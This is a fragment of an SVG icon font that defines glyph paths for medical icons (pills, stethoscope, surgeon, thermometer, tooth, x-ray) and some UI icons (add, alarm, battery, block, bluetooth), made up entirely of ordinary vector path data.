<glyph glyph-name="patient-file" horiz-adv-x="1000" unicode="&#xec2e;" d="M350 655c3 0 6 0 9 0h220c23 0 47-1 70 1 17 0 26 9 26 23 0 15-10 26-26 28-18 2-37 4-56 5-23 1-38 6-37 35 0 4-1 8-2 12-3 16-12 25-28 27-15 1-30 2-45 1-27-2-38-13-39-41-1-25-9-32-33-34-20-1-40-3-60-5-15-2-27-14-26-28 0-13 11-23 27-24z m150 111c10 0 18-9 18-19 0-11-7-19-18-19-11 0-20 8-19 20 0 10 9 19 19 18z m192-96c-5-21-20-29-40-29-102-1-204-1-306 0-21 0-31 8-38 28l-1 4c-1 2-9 3-18 3h-68c-9 0-17-7-17-16v-731c0-9 8-17 17-17h558c9 0 17 8 17 17v731c0 10-8 17-17 17-27 0-53 0-80 0-2 0-7-4-7-7z m-290-179h42c9 0 17 7 17 17v42c0 9 7 17 16 17h45c9 0 17-8 17-17v-42c0-9 7-16 16-16h44c9 0 16-8 16-17v-45c0-9-7-16-16-16h-43c-9 0-16-8-16-17v-44c0-9-8-16-17-16h-45c-9 0-16 7-16 16v44c0 9-8 16-17 16h-43c-10 0-17 8-17 17v44c0 10 7 17 17 17z m283-479h-369c-10 0-17 8-17 17v12c0 9 7 16 17 16h369c9 0 16-7 16-16v-12c0-9-7-17-16-17z m0 98h-369c-10 0-17 8-17 17v12c0 9 7 16 17 16h369c9 0 16-7 16-16v-12c0-9-7-17-16-17z m0 98h-369c-10 0-17 8-17 17v12c0 9 7 16 17 16h369c9 0 16-7 16-16v-12c0-9-7-17-16-17z" />
<glyph glyph-name="pills" horiz-adv-x="1000" unicode="&#xec2f;" d="M977 219c-22 38-46 75-68 113-69 113-137 226-206 339-35 58-88 87-155 89-44 2-81-15-116-38-82-54-107-159-58-244 38-64 77-127 115-190 53-87 105-174 158-261 40-64 99-92 175-86 38 3 70 20 100 41 77 53 101 156 55 237z m-170 203c-86-52-171-104-258-156-5-4-13-2-16 4-19 30-37 60-55 90-26 42-51 85-77 127-46 77-24 168 53 215 29 18 59 32 94 31 52-2 96-22 125-67 42-67 83-135 124-203 5-8 9-16 14-24 4-6 2-14-4-17z m-427-118c-62 73-186 101-283 35-100-67-116-191-79-266 3-6 11-8 16-4l343 219c6 3 8 11 3 16z m23-56c-114-74-229-147-344-220-5-4-7-11-2-16 61-72 180-101 278-39 100 63 123 185 84 270-3 6-10 8-16 5z" />
<glyph glyph-name="prescription" horiz-adv-x="1000" unicode="&#xec30;" d="M734 780h-133v23c0 26-21 47-47 47h-108c-26 0-48-21-48-47v-23h-133c-60 0-109-49-109-109v-712c0-60 49-109 109-109h469c61 0 110 49 110 109v712c0 60-49 109-110 109z m-234 49c13 0 24-11 24-24 0-13-11-24-24-24-13 0-24 11-24 24 0 13 11 24 24 24z m-128-116h256v-100h-256v100z m362-800h-469c-25 0-46 21-46 46v712c0 25 21 47 46 47h45v-112c0-30 25-55 55-55h270c30 0 55 25 55 55v112h44c26 0 47-22 47-47v-712c0-25-21-46-47-46z m-342 533l-11-13c-4 10-13 16-24 16h-72c-14 0-26-11-26-25v-80c0-14 12-26 26-26h72c14 0 26 12 26 26v43l33 39c5 7 5 17-2 22s-16 5-22-2z m-26-102c0-5-4-9-8-9h-73c-5 0-9 4-9 9v80c0 5 4 8 9 8h73c4 0 8-3 8-8v-9l-21-25c-6-7-15-7-22-1l-13 12c-6 6-16 5-22-1-6-6-5-16 1-22l37-34c3-3 6-4 10-4h1c5 0 8 2 11 5l18 22 0-23z m26-68l-12-14c-4 8-13 13-22 13h-73c-14 0-25-11-25-25v-80c0-14 11-25 25-25h73c13 0 25 11 25 25v47l33 39c5 7 5 17-2 22-7 6-16 5-22-2z m-26-106c0-5-4-8-8-8h-73c-5 0-9 3-9 8v80c0 5 4 9 9 9h73c4 0 8-4 8-9v-5l-21-25c-6-7-15-7-22-1l-13 12c-6 6-16 5-22-1-6-6-5-16 1-22l37-34c3-3 6-4 10-4h1c5 0 8 2 11 5l18 21 0-26z m26-65l-13-15c-4 8-12 13-21 13h-73c-14 0-25-11-25-25v-80c0-14 11-26 25-26h73c13 0 25 12 25 26v48l33 39c5 7 5 17-2 22-7 6-16 5-22-2z m-26-107c0-5-4-9-8-9h-73c-5 0-9 4-9 9v80c0 5 4 8 9 8h73c4 0 8-3 8-8v-4l-21-25c-6-6-15-7-22-1l-13 12c-6 6-16 5-22-1-6-6-5-16 1-22l37-34c3-3 6-4 10-4 1 0 1 0 1 0 5 0 8 2 11 6l18 21 0-28z m364 397h-253c-9 0-16-7-16-16 0-9 7-16 16-16h253c8 0 15 7 15 16s-7 16-15 16z m0-154h-253c-9 0-16-7-16-15 0-9 7-16 16-16h253c8 0 15 7 15 16 0 8-7 15-15 15z m0-153h-253c-9 0-16-7-16-15s7-16 16-16h253c8 0 15 7 15 16 0 8-7 15-15 15z" />
<glyph glyph-name="pulse" horiz-adv-x="1000" unicode="&#xec31;" d="M510 38c-4-9-12-14-21-15h0c-10 0-18 6-21 15l-169 418-60-124c-4-8-12-13-21-13h-145c2-2 3-5 5-8l39-57c10-12 20-25 32-37 131-142 221-247 277-314 40-48 104-49 144-1 54 65 139 165 261 298l-259 0-62-162z m228 796c-67 0-129-26-176-69-46-43-83-43-130 0-47 42-108 68-176 68-105 0-195-62-237-151-26-57-22-162-5-223 8-29 20-62 36-97 3 1 7 2 10 2h144l77 158c4 8 13 13 21 12 9 0 16-6 20-14l166-413 47 123c4 9 12 14 21 14h291c6 0 12-2 16-6 7 10 15 21 23 32 21 30 65 98 86 157 28 84 28 146 28 146 0 145-117 261-262 261z" />
<glyph glyph-name="stethoscope-alt" horiz-adv-x="1000" unicode="&#xec32;" d="M978 425c-35 28-102 4-153-53-48 13-91 10-127-10-70-40-96-130-106-199-2-10-3-21-5-32-15-119-30-231-171-231-2 0-5 0-7 0-40 1-69 13-88 38-35 45-29 119-25 150 14 6 24 20 25 37l2 60 74 23c10 2 17 8 22 16 14-3 30-3 42 5 21 13 51 37 89 84 41 52 51 93 52 120 0 19-13 38-23 44-10 5-12-5-10-24 3-29-1-72-38-119-1-1-2-2-2-3l0 2c9 14 16 28 22 44 60 159-69 344-75 352-1 1-3 3-4 4 3 8 2 16-4 20-10 6-25 25-34 42l-15 30c-9 17-27 20-41 7l-39-38c-14-13-11-31 6-40l27-14c17-9 36-25 42-36 4-8 15-9 25-3 11-16 118-179 69-308-2-6-5-10-8-16l0 0c-3 1-6 2-9 2-8 0-15-2-21-6l9-9c-5-6-9-15-9-24 0-2 1-4 1-7-17-18-39-35-65-49-9 5-21 7-32 3l-91-27-98 31c-11 4-22 2-32-3-46 27-78 62-94 105-51 136 69 307 70 309 0 0 0 1 0 1 0 0 3-3 7-6 3-3 11 3 17 14 6 11 24 27 41 36l27 14c17 9 20 26 6 40l-39 37c-13 14-32 11-41-6l-15-30c-9-17-24-36-34-42-10-7-14-15-10-19l8-8c-2-1-3-2-5-4-5-8-135-193-75-352 20-54 59-97 116-130 1-16 12-30 28-35l80-25-2-60c-1-12 4-23 13-31-6-37-13-127 34-187 27-35 69-54 123-55 3-1 6-1 8-1 182 0 201 151 217 272 2 10 3 21 5 32 11 82 41 141 82 164 21 12 46 15 75 10-36-59-40-121-8-147 38-30 112 0 164 66 53 67 65 145 27 175z m-456-102c-3-3-6-7-9-11 3 4 6 8 9 12l0-1z m362-18c-20-25-48-36-62-24-10 8-10 26-2 44 7-2 15-5 23-8 12-5 25 1 30 12 5 12-1 26-12 31-4 1-7 2-11 3 16 12 33 16 43 8 15-12 10-41-9-66z" />
<glyph glyph-name="stethoscope" horiz-adv-x="1000" unicode="&#xec33;" d="M225 794c0-35-1-67 1-100 2-46 4-91 9-136 7-58 20-114 57-161 25-31 57-52 95-65 5-2 13 0 18 3 18 9 34 8 51-3 4-3 12-4 18-2 74 20 118 71 142 141 21 59 22 120 26 181 3 41 2 82 4 122 0 6 0 12 0 20-35 0-68 0-101 0-4 0-9-6-14-8-15-7-29-4-40 8-11 12-11 30-2 42 9 13 26 17 42 11 9-3 19-6 29-6 33-1 67 0 100-1 24-1 32-9 32-32 1-99-2-198-18-295-13-84-49-154-123-200-21-13-44-20-67-29-13-5-33-28-33-42 2-70 2-141 4-212 2-61 38-110 89-128 65-22 132 12 159 81 5 11 8 24 11 36 5 21 9 40-19 54-30 15-38 55-26 87 13 34 42 53 79 52 33-2 62-25 70-57 9-34-4-70-34-87-12-8-19-14-21-31-3-41-15-81-40-115-42-56-97-80-165-70-66 10-113 48-134 111-11 36-16 75-18 113-3 55-1 110-1 165 0 14-21 42-34 47-98 35-149 110-170 208-23 104-23 210-23 316 0 17 9 27 25 27 36 1 71 1 106 2 11 1 21 3 31 7 15 5 33 1 42-12 8-11 7-31-2-42-10-11-28-14-43-7-9 4-19 7-28 7-27 1-54 0-84 0z m517-618c-24 0-42-19-43-43 0-22 21-42 43-42 23-1 43 19 43 42 0 24-19 43-43 43z" />
<glyph glyph-name="stretcher" horiz-adv-x="1000" unicode="&#xec34;" d="M987 454c-11 6-23 4-35 4-98 1-195 0-293 1-10 0-28-6-29 10 0 17 18 11 28 12 60 0 119 0 179 0 19 0 37 3 38 26 1 27-17 30-39 30-41-1-82 0-134 0 40 36 70 64 102 92 15 14 24 29 10 46-16 20-34 10-49-4-37-33-74-66-112-100-8-7-15-14-30-14-98 2-197 1-296 2-25 0-51 2-65-26-14-26-3-47 19-72-13-1-18-2-24-2-24-2-43-5-24 32 13 25 3 54-27 68-23 12-46 9-65-9-20-19-24-43-11-65 14-25 5-28-18-27-22 1-45 1-67 0-21 0-45 2-45-27 0-30 25-30 47-29 28 0 57-1 85 0 19 1 25-5 25-24-1-83 0-166 0-249 0-11-2-20-10-29-24-26-25-52-6-72 19-18 50-19 68 0 20 20 19 47-5 72-13 13-14 27-10 42 5 18 22 9 34 9 179 1 359 1 538 0 13 0 32 8 39-8 7-16 3-32-13-47-23-20-21-51-1-69 21-19 44-17 65 0 21 17 22 47 1 69-11 11-15 22-15 37 1 81 1 162 1 243 0 20 6 27 27 26 33-2 66-1 100 0 13 0 25 6 29 21 3 13-1 24-12 31z m-794-392c-1-12-7-18-18-18-12 0-17 8-17 18 0 11 7 18 18 18 11-1 16-9 17-18z m566 146c-87 0-173 0-260 0v0c-90 0-181 1-271-1-29 0-36 8-35 36 3 45 2 90 1 135-1 20 6 24 24 24 188-1 375-1 563 0 19 0 27-3 26-26-2-39 2-78 2-117 0-52 0-51-50-51z m83-145c-1-11-6-18-17-19-11-1-18 5-19 16 0 11 6 19 17 20 10 1 17-6 19-17z" />
<glyph glyph-name="surgeon-alt" horiz-adv-x="1000" unicode="&#xec35;" d="M276 613c57 43 152 60 222 60 69 0 164-16 221-57 23-17 35-14 35 15v83c0 75-70 136-156 136h-200c-86 0-156-62-156-138v-85c0-29 12-31 34-14z m474-313h-515c-26 0-26-21-26-47v-368c0-19 15-35 34-35h514c19 0 34 15 34 35v368c0 26-15 47-41 47z m-29-236c0-3-2-5-5-5h-29c-1 0-2-1-2-2v-29c0-2-2-5-5-5h-24c-3 0-6 2-6 5v29c0 1 0 2-1 2h-29c-3 0-5 2-5 5v25c0 2 2 5 5 5h29c1 0 1 1 1 2v29c0 2 3 5 6 5h24c3 0 5-3 5-5v-29c0-1 1-2 2-2h29c3 0 5-3 5-5v-25z m-7 465c0 0 1 6 2 13 0 7-4 18-9 25-21 22-79 71-209 71-136 0-191-48-210-71-5-6-8-18-8-25 1-7 2-13 2-13 0 0 5-4 11-10 19-16 57-47 89-68 6-4 12-7 12-6v2c0 11 9 20 20 20h168c11 0 20-9 20-20v-2c0-1 6 2 12 6 44 28 99 77 100 78 0 0 0 0 0 0z m-333-101c-27 16-59 41-82 61-6 5-10 3-7-5 16-47 48-87 90-113 6-5 12-8 12-7 0 0 0 0 0 1v42c0 8-6 17-13 21z m316 61c-23-19-55-45-82-60-7-5-13-14-13-22v-42c0-1 0-1 0-1 0-1 5 2 12 7 42 26 74 66 90 113 3 8-1 10-7 5z m-243-148c14-2 29-4 44-4 15 0 30 2 44 4 8 2 8 4 0 4h-88c-8 0-8-2 0-4z" />
<glyph glyph-name="surgeon" horiz-adv-x="1000" unicode="&#xec36;" d="M504 181c22 31 44 61 64 93 7 10 14 15 27 14 22-2 45 2 68-4l3-1c15-4 15-4 14-20-4-52-8-104-11-156-4-48-8-97-13-146-5-40 3-78 29-111h-370c13 17 21 34 26 52 7 24 5 48 2 72-8 53-10 107-14 160-3 45-6 91-9 136 0 6 1 9 7 11 12 4 23 6 35 6 17 0 34 0 51 1 6 0 9-2 13-7 23-31 47-62 71-93 2-2 3-5 7-7z m-9 440h-183c-4 0-8-1-10 6-6 38-8 76 4 113 14 49 48 80 96 94 64 20 128 21 193 3 60-17 94-60 100-123 3-28-1-55-5-83-1-7-4-9-11-9-61 0-123 0-184 0v-1z m0-20c61 0 121 0 182 0 25 1 41-11 51-32 10-22 7-43-8-61-9-10-19-18-32-19-8-1-10-5-12-12-10-37-25-72-50-102-28-33-61-57-105-63-50-7-91 11-126 45-34 34-55 76-67 122-1 7-4 8-11 9-41 0-66 39-51 76 4 8 8 15 13 22 8 10 18 15 32 15 62 0 123 0 184 0z m1-27h-183c-15 0-17-2-21-16-8-25 10-41 28-39 5 1 10 0 15 0 11 2 16-2 16-12 1-14 8-20 23-21 30-3 60-10 91-12 59-4 118 3 177 13 5 1 7 2 8 7 2 8 2 18 7 23 5 6 16 1 25 2 13 2 23 15 23 29-1 16-10 26-25 26h-184z m-60-212c42-32 102-27 131 0h-131z m166 36c17 18 28 38 36 62-11-2-21-3-31-4-4-1-5-3-5-7 0-17 0-34 0-51z m-238 63c9-24 19-44 35-62 1 18 1 35 1 53 0 3-2 4-5 4-10 2-19 3-31 5z m513-211c-1-25-2-50-3-75 0-2-2-7 3-7 3 0 3 4 3 7l3 49c1 13 6 20 17 20 10 1 16-6 17-18 2-19 3-38 5-56 1-11-2-19-10-27-10-9-19-19-30-28-20-15-28-36-30-60-1-11-4-22-5-33-1-7-3-8-9-8-36 2-72 4-108 6-8 0-16 1-24 1-5 0-7 2-7 7 3 40 4 80 7 119 4 49 9 98 13 147 0 2 0 4 0 6 2 9 8 15 16 14 8-1 13-7 13-17-1-18-2-36-3-54 0-8 0-17-1-25 0-2-1-6 2-6 4-1 3 3 3 5 2 17 4 34 5 51 3 21 5 43 7 64 1 10 7 16 15 15 8 0 13-7 13-17-2-35-3-71-5-106 0-2 0-4 0-5 0-2-1-5 2-5 3-1 2 2 3 4 2 21 4 41 6 62 2 25 4 50 7 75 1 12 8 18 19 17 9-1 15-9 15-20-2-45-5-89-7-134l0-3c0-3-1-6 3-6 4 0 2 3 3 5 1 11 2 22 3 33l9 80c1 11 7 17 17 17 10 0 16-7 16-19-1-25-2-50-3-75h0z m-754 1l-3 72c0 12 5 20 15 21 11 1 18-5 19-18 4-36 7-71 11-107l0-6c1-2 1-4 4-4 2 1 2 2 2 4 0 4 0 8 0 12-2 41-4 83-5 124-1 15 4 22 15 23 11 0 17-7 18-22 4-43 8-87 12-131 0-2 0-6 4-6 3 1 2 5 2 7-2 34-4 69-5 103-1 16 3 24 14 24 9 0 14-7 15-23 3-35 6-71 10-106 0-2-1-7 2-6 5 0 3 4 3 7-1 25-2 50-3 76 0 11 4 18 13 18 9 1 14-5 15-17 9-88 16-176 18-265 1-8-1-11-10-11-42-1-85-4-127-6-7 0-10 2-10 9-3 18-6 37-9 55-1 9-4 16-11 23l-44 43c-8 7-12 15-10 26 2 19 4 39 5 58 1 11 9 18 18 17 9 0 16-7 16-18 1-16 2-32 3-49 0-3-1-10 3-10 6 0 3 6 3 10 0 24 0 49 0 73-1 0-2 0-3 0z m117-250c11 0 32 1 52 3 7 0 10-2 11-9 5-28 9-57 3-85-7-34-24-52-53-57-33-6-64 8-80 36-18 32-20 66-18 102 0 6 4 6 9 6 22 1 44 2 76 4z m528 0c23-2 46-3 69-4 5 0 7-2 7-8 0-29-3-58-14-85-16-40-49-58-88-50-23 5-37 21-44 43-9 28-8 56-4 85 3 23 4 23 27 21 8 0 16-1 24-1 8 0 15-1 23-1v0z m-344 550c15 0 27-11 27-26 0-15-12-27-27-27-14 0-26 12-26 27 0 14 12 26 26 26z m129-26c0 14 11 26 26 26 15 1 27-12 27-26 0-15-13-27-27-27-14 0-26 12-26 27z" />
<glyph glyph-name="tablets" horiz-adv-x="1000" unicode="&#xec37;" d="M166 180c81-31 164-40 249-33 57 6 112 18 164 43 16 7 31 16 46 25 7 3 12 7 12 8-1 1-2 2-4 3-1 1-2 1-3 2-76 35-151 71-227 106-109 52-218 103-327 155-6 3-10 2-15-2-7-9-16-16-23-25-21-26-35-55-37-89-3-47 17-86 49-119 33-34 73-57 116-74z m93 259c133-63 267-126 400-189 5-2 8-2 11 2 6 6 12 12 17 19 45 56 46 128 3 185-32 41-74 68-121 89-54 23-111 35-170 38-84 6-165-5-243-38-15-6-30-14-45-22-7-4-12-7-12-8s6-3 13-7c49-23 98-46 147-69z m456-166c-6-11-12-22-19-33-24-35-59-57-97-76-61-29-127-42-195-46-58-4-117-1-174 12-55 12-107 31-153 64-30 22-56 48-70 82-1 3-2 5-3 7-1 4-3 7-3 7s-1-6-1-12c1-4 1-8 1-12 0-43 18-79 47-109 33-37 75-61 121-78 102-38 206-43 312-22 65 14 126 39 177 83 31 27 55 60 62 102 1 10 2 20 2 30 0 8 0 14 0 14 0 0-4-6-7-13z m159 33c13 7 27 14 40 22 6 4 10 7 10 7 0 1-2 3-3 3-1 1-2 1-3 2-58 27-117 55-175 82 17-33 26-70 26-107 0-15-1-28-3-42 37 7 73 17 108 33z m-160 163c77-37 153-73 230-109 5-3 7-3 10 1 5 6 10 11 15 17 40 49 41 113 2 164-28 36-65 60-106 78-49 21-99 31-151 34-74 5-146-5-215-34-8-3-17-7-25-12 102-21 188-72 240-139z m286-78c-1 0-4-5-7-11-5-10-10-20-16-29-22-31-52-51-86-67-42-20-87-32-132-38-7-23-18-45-31-66 19 2 39 5 58 9 59 12 112 34 157 73 28 24 48 53 55 90 1 9 1 18 2 27 0 7 0 12 0 12z" />
<glyph glyph-name="test-bottle" horiz-adv-x="1000" unicode="&#xec38;" d="M882 522l-73 109c-5 8-9 21-9 29 0 8 3 15 7 15 3 0 6 7 6 17v141c0 9-7 17-17 17h-591c-9 0-17-8-17-17v-141c0-10 3-17 6-17 4 0 6-7 6-15s-4-21-9-29l-73-109c-5-8-9-22-9-32v-623c0-9 8-17 17-17h748c10 0 17 8 17 17v623c0 10-4 24-9 32z m-149 290c0 5 4 8 9 8s8-3 8-8v-110c0-5-4-9-8-9-5 0-9 4-9 9v110z m-97 0c0 5 3 8 8 8 5 0 9-3 9-8v-110c0-5-4-9-9-9s-8 4-8 9v110z m-98 0c0 5 4 8 9 8s8-3 8-8v-110c0-5-4-9-8-9-5 0-9 4-9 9v110z m-98 0c0 5 4 8 9 8 5 0 8-3 8-8v-110c0-5-3-9-8-9s-9 4-9 9v110z m-97 0c0 5 4 8 8 8 5 0 9-3 9-8v-110c0-5-4-9-9-9s-8 4-8 9v110z m-98 0c0 5 4 8 9 8s8-3 8-8v-110c0-5-3-9-8-9-5 0-9 4-9 9v110z m578-877c0-10-7-17-17-17h-612c-9 0-17 8-17 17v185h646v-185z m-289 357h53c3 0 6-2 6-6v-44c0-3-3-6-6-6h-53c-3 0-6-3-6-6v-52c0-4-2-6-6-6h-44c-3 0-6 2-6 6v52c0 3-3 6-6 6h-52c-4 0-7 3-7 6v44c0 4 3 6 7 6h52c3 0 6 3 6 7v52c0 3 3 6 6 6h44c4 0 6-3 6-6v-52c0-4 3-7 6-7z m289 106h-646v72c0 9 4 23 9 31l73 110c5 8 9 22 9 31v16c0 9 8 17 17 17h430c10 0 17-8 17-17v-16c0-9 4-23 9-31l73-110c5-8 9-22 9-31v-72z" />
<glyph glyph-name="test-tube" horiz-adv-x="1000" unicode="&#xec39;" d="M615 850h-231c-32 0-57-26-57-58 0-24 15-45 36-53 8-4 16-12 16-21v-753c0-63 51-115 115-115h11c64 0 116 52 116 115v753c0 9 7 17 16 21 21 8 36 29 36 53 0 32-26 58-58 58z m-158-889c0-4-4-8-8-8-5 0-8 4-8 8v471c0 4 3 8 8 8 4 0 8-4 8-8v-471z m158 819h-22c-10 0-17-5-17-11l0-11v-254c0-9-8-17-17-17h-119c-9 0-16 8-16 17v259c0 9-7 17-17 17h-23c-6 0-12 5-12 12s5 13 12 13h231c7 0 13-6 13-13s-6-12-13-12z" />
<glyph glyph-name="thermometer-alt" horiz-adv-x="1000" unicode="&#xec3a;" d="M38-49c-24-26-25-64-2-86 23-22 61-19 86 6l30 32-84 79-30-31z m561 517l-434-455c-3-4-2-9 1-12 3-3 8-3 11 1l433 455c3 3 3 9 0 12-3 3-8 2-11-1z m333 330l-9 8c-64 61-165 58-225-5l-412-433c-48-51-56-124-25-183l-177-186 83-80 177 186c60-27 134-15 182 35l411 433c61 64 58 164-5 225z m-9-170c-4-5-12-5-17 0l-53 50-78-82 53-51c5-4 5-12 0-17-4-5-12-5-17 0l-53 50-78-82 53-51c4-4 5-12 0-17-5-5-12-5-17 0l-53 50-79-82 53-51c5-5 5-12 1-17-5-5-12-5-17 0l-53 50-79-83 53-50c5-5 5-12 1-17-5-5-12-5-17 0l-53 50-279-293c-12-13-32-13-45-1-13 12-13 32-1 45l279 293-43 41c-5 5-5 12 0 17 4 5 12 5 16 1l44-41 78 82-43 41c-5 5-5 12 0 17s12 5 17 1l43-41 78 82-43 41c-4 5-5 12 0 17 5 5 12 5 17 1l43-41 79 82-43 41c-5 5-5 12-1 17 5 5 12 5 17 1l43-41 79 82-43 41c-5 5-5 12-1 17 5 5 12 5 17 1l43-41 10 10c12 13 33 13 45 1s14-32 2-45l-10-10 53-51c4-4 4-12-1-17z" />
<glyph glyph-name="thermometer" horiz-adv-x="1000" unicode="&#xec3b;" d="M608 268c-8 5-11 11-11 21 1 67 1 134 1 202v194c0 9 0 18-3 27-12 47-57 80-103 75-54-6-90-46-90-98 0-134 0-268 0-401 0-9-3-15-10-20-49-33-77-79-85-138-17-128 102-241 229-214 83 18 135 70 154 153 17 75-16 154-82 199z m49-187c-11-66-60-116-127-130-99-21-194 61-189 162 3 59 31 103 81 133 10 6 14 12 14 25l-1 215c0 13 4 17 17 16 9-1 19 0 29 0 6 0 15-1 15 8 0 10-9 9-16 9-11 0-22 1-33 0-11-1-11 5-11 13-1 9 1 13 11 13 12-1 24-1 35-1 7 0 14 1 14 8 0 9-7 10-14 10-12 0-24 1-35 0-11-1-11 5-11 13-1 9 2 13 11 12 11-1 23 0 34 0 6 0 15-1 15 8 0 10-9 10-16 10-11 0-21 0-32-1-10 0-13 4-12 13 0 9 2 13 12 13 11-1 22 0 33-1 7 0 15 0 15 9 0 9-7 9-15 9-11 0-22 1-33 0-10-1-13 4-12 13 0 9 2 13 12 12 11 0 22 0 33 0 7 0 14 0 15 9 0 9-7 9-14 9-12 0-23 1-34 0-12-1-13 4-10 14 9 32 37 51 72 47 29-3 53-30 54-62 0-70 0-140 0-211h0c0-68 0-136 0-205 0-13 4-21 16-28 58-35 88-100 77-164z m-112 117c-8 4-10 9-10 17 0 33 0 66 0 98 0 34 0 67 0 100 0 23-16 39-37 38-19-1-33-17-33-40 0-65 0-129 1-194 0-10-3-15-13-20-44-20-69-69-62-115 9-53 52-92 104-94 52-3 99 32 112 82 13 52-12 105-62 128z" />
<glyph glyph-name="tooth" horiz-adv-x="1000" unicode="&#xec3c;" d="M882 686c-2 39-24 90-43 113-20 23-57 45-83 49-26 4-78 3-117-3l-139-19-139 19c-40 6-92 7-118 3-26-4-62-26-82-49-20-23-42-74-44-113-4-70 1-181 51-282 0 0 36-72 36-186 0-84 32-265 73-345 18-35 73-28 84 10 38 133 66 468 139 467 73 1 100-334 139-467 11-38 65-45 83-10 42 80 74 261 74 345 0 114 35 186 35 186 50 101 55 212 51 282z" />
<glyph glyph-name="xray" horiz-adv-x="1000" unicode="&#xec3d;" d="M598 756c0-52-42-94-94-94s-94 42-94 94 42 94 94 94 94-42 94-94z m111-112h-419c-15 0-27-13-27-28v-292c0-16 12-28 27-28h103l0-76v-319c0-28 22-51 45-51 23 0 41 23 41 51v282h52v-282c0-28 18-51 41-51s43 23 43 51l0 322v73h94c15 0 28 13 28 28v292c0 15-12 28-28 28z m-198-95h86c3 0 5-1 7-3 2-2 2-5 2-8l-2-16-82-8c-4 0-7 0-11 0l0 35z m0-90c5 0 9 0 13 1l74 7-3-27-73-8c-3 0-7 0-11 0l0 27z m11 14c-3 0-7 0-11 0v27c4 0 9 0 12 1l80 8-4-27-77-9z m-25-117h-61c-7 0-13 6-14 13l-2 17 70-8c2-1 4-1 7-1v-21z m0 35c-2 0-4 0-6 1l-73 8-3 26 70-7c4-1 8-1 12-1v-27z m0 41c-4 0-7 0-10 0l-73 8-4 27 75-7c4-1 8-1 12-1v-27h0z m0 41c-4 0-7 0-10 0l-78 9-4 26 80-7c3-1 8-1 12-1v-27z m0 41c-4 0-8 0-11 0l-82 9-2 15c-1 3 0 6 2 8 2 2 4 3 7 3h86v-35z m0 49h-86c-7 0-13-3-17-8-5-5-7-11-6-18l20-170c2-14 14-25 28-25h61v-27h-147c-3 2-5 5-5 9v245c0 6 5 12 11 12h141v-18z m0 32h-141c-14 0-25-12-25-26v-245c0-4 0-7 2-9h-43c-5 0-9 4-9 9v292c0 5 4 9 9 9h207v-30z m14-177c4 0 9 0 13 1l69 7-4-27-63-7c-4-1-10-1-15-1l0 27z m0-41c6 0 12 0 17 1l60 7-2-16c-1-7-7-13-14-13h-61l0 21z m147-62h-147v27h61c14 0 26 11 28 25l20 170c1 7-1 13-6 18-4 5-10 8-17 8h-86v18h140c6 0 12-6 12-12v-245c0-4-2-7-5-9z m61 9c0-5-5-9-10-9h-34c1 2 2 5 2 9v245c0 14-12 25-26 25h-140v31h198c5 0 10-4 10-9l0-292z" />
<glyph glyph-name="ui-add" horiz-adv-x="1000" unicode="&#xec3e;" d="M943 493h-300v300c0 31-26 57-57 57h-172c-31 0-57-26-57-57v-300h-300c-31 0-57-26-57-57v-172c0-31 26-57 57-57h300v-300c0-31 26-57 57-57h172c31 0 57 26 57 57v300h300c31 0 57 26 57 57v172c0 31-26 57-57 57z" />
<glyph glyph-name="ui-alarm" horiz-adv-x="1000" unicode="&#xec3f;" d="M516 850c7-6 15-10 21-17 17-20 11-50-11-65-6-3-7-7-7-13 0-19 0-39 0-58 194-22 329-121 377-313 45-177-19-321-161-434 13-13 26-26 40-39 9-10 13-21 11-34-6-26-37-36-58-17-16 15-32 31-48 48-6 6-10 7-19 4-107-46-215-45-323 0-7 4-11 2-16-3-15-16-31-32-47-48-15-14-37-15-50-1-14 14-14 35 1 50 7 7 14 14 21 20 6 7 13 13 19 20-157 127-214 286-148 480 47 138 183 256 364 266 0 22 1 43 0 65 0 2-2 4-4 5-31 16-32 65 4 82 1 0 2 1 2 2h32z m299-563c0 172-142 315-314 314-173 0-314-140-315-313-1-172 141-314 314-315 173 0 314 141 315 314z m-812 335c3 17 6 34 11 51 28 82 84 134 169 151 87 18 160-11 217-79 1-1 2-2 3-3 1-1 1-2 1-3-160-39-272-133-340-288-1 3-2 7-4 9-31 35-49 76-55 122 0 3-2 7-2 10l0 30z m592 116c56 69 126 101 212 88 92-14 154-68 181-158 24-80 3-152-53-216-30 74-74 136-134 187-59 50-127 83-206 99z m-62-428h14c29 0 59 1 88 0 18 0 31-13 31-31 0-18-13-32-32-32-44 0-89 0-133 0-19 0-32 13-32 33 0 68 0 136 0 204 0 20 14 34 32 33 18 0 32-14 32-33 0-53 0-106 0-159 0-5 0-9 0-15z" />
<glyph glyph-name="ui-battery" horiz-adv-x="1000" unicode="&#xec40;" d="M427 600c127 0 254 0 381 0 30 0 46-16 46-45 0-137 0-274 0-410 0-28-17-45-44-45-84 0-168 0-252 0-69 1-138 0-207 0-87 0-175 0-262 0-16 0-32 0-47 0-25 0-42 17-42 42 0 67 0 134 0 200 0 71 0 141 0 211 0 31 16 47 47 47 126 0 253 0 380 0z m-346-419h692v338h-692v-338z m833 271c19 0 37 2 55-1 18-3 30-14 30-35 2-44 1-87 0-131 0-20-16-36-36-37-16-1-32 0-49 0v204z m-785 17h117v-238h-117v238z m609-238h-129v238h129v-238z m-105 24h81v190h-81v-190z m-62-24h-125v238h125v-238z m-101 24h77v190h-77v-190z m-182 214h117v-238h-117v238z" />
<glyph glyph-name="ui-block" horiz-adv-x="1000" unicode="&#xec41;" d="M854 704c-196 195-512 195-708 0-195-196-195-512 0-708 196-195 512-195 708 0 195 196 195 512 0 708z m-591-117c111 111 280 128 408 51l-459-459c-76 128-60 297 51 408z m474-474c-111-111-280-128-408-51l459 459c77-128 60-297-51-408z" />
<glyph glyph-name="ui-bluetooth" horiz-adv-x="1000" unicode="&#xec42;" d="M594 348c54-55 108-108 162-162 32-32 32-57-1-90-76-76-151-152-227-227-30-30-73-24-87 12-4 10-4 21-4 32 0 83 0 166 0 249v28c-8-8-14-12-18-16l-102-102c-30-30-60-34-83-10-23 24-20 52 10 82l178 177c22 22 22 33 0 55-61 62-123 123-184 185-30 30-22 74 16 87 22 7 40 0 55-15 36-36 71-71 106-107 6-5 12-10 20-18 1 9 2 14 2 20 0 81 0 161 0 242 0 7-1 14-2 21-3 24 7 42 27 53 21 10 41 8 58-9 10-9 19-18 29-28 70-70 140-140 211-211 27-27 27-54 0-81-49-50-99-99-148-148-6-6-12-12-18-19z m-55 100c37 37 75 74 107 106-35 35-72 72-107 108v-214z m0-418c38 39 76 76 109 109l-109 110v-219z" />
